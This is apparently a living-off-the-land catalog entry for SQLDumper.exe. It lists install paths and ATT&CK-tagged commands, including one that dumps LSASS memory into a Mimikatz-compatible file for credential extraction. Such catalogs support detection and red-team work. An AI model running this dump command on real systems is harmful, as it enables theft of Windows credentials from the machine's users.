Sqldumper.exe

type: OtherMSBinaries
Debugging utility included with Microsoft SQL.

Full path

C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
C:\Program Files\Microsoft Power BI Desktop\bin\SqlDumper.exe

Commands

  1. DumpAdministrator T1003

    Dump process using PID.

    sqldumper.exe 464 0 0x0110

    Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).

    os: Windows

  2. DumpAdministrator T1003.001

    Dump LSASS.exe to Mimikatz compatible dump using PID.

    sqldumper.exe 540 0 0x01100:40

    0x01100:40 flag will create a Mimikatz compatible dump file.

    os: Windows

Detection

Resources

acknowledgement: Luis Rocha @countuponsec